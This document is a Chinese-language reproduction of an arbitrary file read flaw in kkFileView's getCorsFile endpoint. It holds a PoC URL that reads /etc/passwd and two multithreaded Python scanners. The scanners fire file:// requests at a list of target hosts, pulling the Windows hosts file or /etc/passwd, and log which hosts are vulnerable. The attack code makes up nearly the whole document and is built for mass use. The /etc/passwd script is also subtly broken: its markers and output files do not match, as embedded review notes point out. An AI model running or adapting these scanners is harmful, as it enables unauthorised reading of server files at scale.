kkFileView任意文件读取漏洞复现

POC（getCorsFile 接口的 urlPath 参数接受 file:// 协议的地址，因此会返回服务器本地文件的内容）
/getCorsFile?urlPath=file:///etc/passwd
https://preview.test.com/getCorsFile?urlPath=file:///etc/passwd
1.读取Windows的hosts文件脚本
import requests
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
# Load the base URLs to check from llliii.txt, one entry per line.
with open("llliii.txt", "r") as url_list:
    urls = url_list.read().splitlines()
# Request function
def check_url(url):
    """Request the Windows hosts file through ``getCorsFile`` and classify the reply.

    Returns ``(url, "localhost")`` when the response body contains the string
    "localhost", ``(url, "no localhost")`` when it does not, and
    ``(url, <exception text>)`` when the request or the body check raises.

    On the server side this request shows up as a GET to ``/getCorsFile``
    whose ``urlPath`` query parameter carries a ``file://`` URL.
    """
    try:
        # verify=False turns off TLS certificate validation; timeout=5 is the
        # per-request timeout handed to requests.get.
        # The URL is a non-raw f-string: its backslash sequences are not
        # recognised escapes, so Python keeps the backslashes literally.
        reply = requests.get(f"{url}/getCorsFile?urlPath=file://C:\Windows\System32\drivers\etc\hosts", verify=False, timeout=5)
        marker_found = "localhost" in reply.text
    except Exception as err:
        # Any failure is reported as the outcome text instead of propagating.
        return url, str(err)
    return url, ("localhost" if marker_found else "no localhost")
# Run check_url for every URL on a pool of up to 200 worker threads and
# collect the (url, outcome) pairs in submission order behind a progress bar.
with ThreadPoolExecutor(max_workers=200) as pool:
    pending = [pool.submit(check_url, target) for target in urls]
    results = [
        task.result()
        for task in tqdm(pending, total=len(urls), desc="Checking URLs")
    ]
# Write the results: URLs whose outcome is exactly "localhost" go to
# win-ok.txt; every other URL goes to win-fault.txt with its outcome text.
with open("win-ok.txt", "w") as hits, open("win-fault.txt", "w") as misses:
    for target, outcome in results:
        if outcome != "localhost":
            misses.write(f"{target}: {outcome}\n")
            continue
        hits.write(f"{target}\n")
2.读取Linux的/etc/passwd文件脚本
import requests
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
# Load the base URLs to check from llliii.txt, one entry per line.
with open("llliii.txt", "r") as url_list:
    urls = url_list.read().splitlines()
# Request function
def check_url(url):
    """Request ``/etc/passwd`` through ``getCorsFile`` and classify the reply.

    Returns ``(url, "root")`` when the response body contains the string
    "localhost", ``(url, "no root")`` when it does not, and
    ``(url, <exception text>)`` when the request or the body check raises.

    On the server side this request shows up as a GET to ``/getCorsFile``
    whose ``urlPath`` query parameter carries a ``file://`` URL.

    NOTE(review): the string tested in the body is "localhost" while the
    labels returned are "root" / "no root"; the two do not correspond, so
    confirm which marker was intended.
    """
    try:
        # verify=False turns off TLS certificate validation; timeout=5 is the
        # per-request timeout handed to requests.get.
        reply = requests.get(f"{url}/getCorsFile?urlPath=file:///etc/passwd", verify=False, timeout=5)
        marker_found = "localhost" in reply.text
    except Exception as err:
        # Any failure is reported as the outcome text instead of propagating.
        return url, str(err)
    return url, ("root" if marker_found else "no root")
# Run check_url for every URL on a pool of up to 200 worker threads and
# collect the (url, outcome) pairs in submission order behind a progress bar.
with ThreadPoolExecutor(max_workers=200) as pool:
    pending = [pool.submit(check_url, target) for target in urls]
    results = [
        task.result()
        for task in tqdm(pending, total=len(urls), desc="Checking URLs")
    ]
# Write the results: URLs whose outcome is exactly "localhost" go to
# win-ok.txt; every other URL goes to win-fault.txt with its outcome text.
# NOTE(review): the check_url defined in this script returns "root",
# "no root" or an exception message, so the comparison with "localhost"
# does not line up with those labels; the win-* file names also match the
# Windows variant rather than this one. Confirm the intended values.
with open("win-ok.txt", "w") as hits, open("win-fault.txt", "w") as misses:
    for target, outcome in results:
        if outcome != "localhost":
            misses.write(f"{target}: {outcome}\n")
            continue
        hits.write(f"{target}\n")